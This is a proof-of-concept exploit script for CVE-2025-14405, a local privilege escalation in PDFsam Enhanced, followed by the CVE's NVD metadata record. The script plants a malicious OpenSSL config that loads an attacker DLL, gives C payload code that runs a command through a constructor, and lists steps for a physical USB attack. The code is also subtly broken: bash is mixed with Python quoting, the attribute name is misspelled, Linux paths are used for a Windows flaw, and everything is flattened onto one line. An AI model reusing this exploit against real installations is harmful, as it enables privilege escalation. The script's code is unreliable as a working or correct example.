CVE-2025-14405

#!/bin/bash # CVE-2025-14405 PoC - PDFsam Enhanced Uncontrolled Search Path # This PoC demonstrates creating a malicious OpenSSL config file # that can be used to escalate privileges when PDFsam Enhanced loads MALICIOUS_CONFIG=""" [openssl_init] section = evil_section [evil_section] # Point to a malicious DLL that will be loaded # In real attack, this would be a DLL with payload code dynamic_path = ./malicious.dll """ # Create directory structure for the attack mkdir -p /tmp/pdfsam_attack cd /tmp/pdfsam_attack # Create the malicious OpenSSL config file echo "$MALICIOUS_CONFIG" > openssl.cnf # Create a malicious shared library (placeholder for actual payload) # In real attack scenario, this would be a compiled DLL with SYSTEM payload cat > malicious.c << 'EOF' // Placeholder for malicious DLL code // Should contain code to execute with SYSTEM privileges void _attribute_((constructor)) init() { // System-level code execution here system("whoami > /tmp/pwned.txt"); } EOF echo "[!] Attack files created in /tmp/pdfsam_attack" echo "[!] In physical attack scenario:" echo " 1. Mount USB drive with this structure" echo " 2. Ensure drive letter matches PDFsam's OpenSSL config path" echo " 3. Execute PDFsam Enhanced to trigger DLL loading" echo " 4. Check /tmp/pwned.txt for SYSTEM-level execution"

{"cve": {"id": "CVE-2025-14405", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:47.077", "lastModified": "2026-01-15T17:23:47.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PDFsam Enhanced Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows phyiscally-present attackers to escalate privileges on affected installations of PDFsam Enhanced. An attacker must first obtain the ability to mount a malicious drive onto the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the configuration of OpenSSL. The product loads an OpenSSL configuration file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27867."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.7, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfsam:enhanced:7.0.76.15222:*:*:*:*:*:*:*", "matchCriteriaId": "6BDD768D-D92D-4D1C-977A-3987C03EACD2"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1093/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}